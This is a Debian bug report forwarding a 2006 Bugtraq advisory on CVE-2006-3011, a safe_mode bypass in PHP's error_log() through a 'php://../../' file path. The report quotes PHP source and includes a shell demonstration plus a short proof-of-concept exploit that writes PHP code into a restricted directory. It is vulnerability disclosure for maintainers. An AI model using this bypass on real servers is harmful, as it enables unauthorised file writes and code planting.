Package: php4 Version: 4.4.2 Severity: grave Justification: security Hello
The following came through bugtraq, please check if we're affected. bye, -christian- On Sun, Jun 25, 2006 at 11:11:34PM -0000, [EMAIL PROTECTED] wrote: > [error_log() Safe Mode Bypass PHP 5.1.4 and 4.4.2] > > Author: Maksymilian Arciemowicz (cXIb8O3) > Date: > -Written: 10.6.2006 > -Public: 26.06.2006 > from SECURITYREASON.COM > CVE-2006-3011 > > --- 0.Description --- > PHP is an HTML-embedded scripting language. Much of its syntax is borrowed > from C, Java and Perl with a couple of unique PHP-specific features thrown > in. The goal of the language is to allow web developers to write dynamically > generated pages quickly. > > A nice introduction to PHP by Stig Sæther Bakken can be found at > http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the > PHP Conference Material is freely available. > error_log -- Send an error message somewhere. > > --- 1. error_log() Safe Mode Bypass --- > error_log() function send to email, file or display your error message. You > can send error messages per mail or write into files. Issue is very simple. > error_log() check safe_mode and open_basedir in stream function. But isn't > allowed use URL. And problem exists in incorrect filename. > > PHP5: > -2013-2050--- > PHPAPI int _php_error_log(int opt_err, char *message, char *opt, char > *headers TSRMLS_DC) > { > php_stream *stream = NULL; > > switch (opt_err) { > > case 1: /*send an email */ > { > #if HAVE_SENDMAIL > if (!php_mail(opt, "PHP error_log message", > message, headers, NULL TSRMLS_CC)) { > return FAILURE; > } > #else > php_error_docref(NULL TSRMLS_CC, E_WARNING, > "Mail option not available!"); > return FAILURE; > #endif > } > break; > > case 2: /*send to an address */ > php_error_docref(NULL TSRMLS_CC, E_WARNING, "TCP/IP > option not available!"); > return FAILURE; > break; > > case 3: /*save to a file */ > stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | > ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL); > if (!stream) > return FAILURE; > php_stream_write(stream, message, strlen(message)); > php_stream_close(stream); > break; > > default: > php_log_err(message TSRMLS_CC); > break; > } > return SUCCESS; > } > -2013-2050--- > > Let's see to option 3. > > -2038 line--- > stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE | > REPORT_ERRORS, NULL); > -2038 line--- > > Option "a", writte to file error or if file dosen't exists, create new file. > Problem is because in php_stream_open_wrapper(), is defined "IGNORE_URL". > IGNORE_URL turn off safe_mode if you use "prefix://../../". > > -Example--- > cxib# php -r 'error_log("<? echo \"cx\"; ?>", 3, "/www/temp/sr.php");' > > Warning: error_log(): SAFE MODE Restriction in effect. The script whose uid > is 0 is not allowed to access /www/temp owned by uid 80 in Command line code > on line 1 > > Warning: error_log(/www/temp/sr.php): failed to open stream: Invalid argument > in Command line code on line 1 > cxib# php -r 'error_log("<? echo \"cx\"; ?>", 3, > "php://../../www/temp/sr.php");' > cxib# ls -la /www/temp/sr.php > -rw-r--r-- 1 cxib www 16 Jun 11 17:47 /www/temp/sr.php > cxib# > -Example--- > > --- 2. Exploit --- > <?php > $file=""; # FILENAME > error_log("<? echo \"cx\"; ?>", 3, "php://../../".$file); > ?> > > > --- 3. How to fix --- > No response from PHP Team. We have reported this bug in 11.06.2006 > > --- 4. Greets --- > > For: sp3x > and > p_e_a, l3x, pi3, eax, Infospec, gKPc8O3 > > --- 5. Contact --- > Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ] > Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com > GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg > SecurityReason.Com > -- Christian Hammers WESTEND GmbH | Internet-Business-Provider Technik CISCO Systems Partner - Authorized Reseller Lütticher Straße 10 Tel 0241/701333-11 [EMAIL PROTECTED] D-52064 Aachen Fax 0241/911879
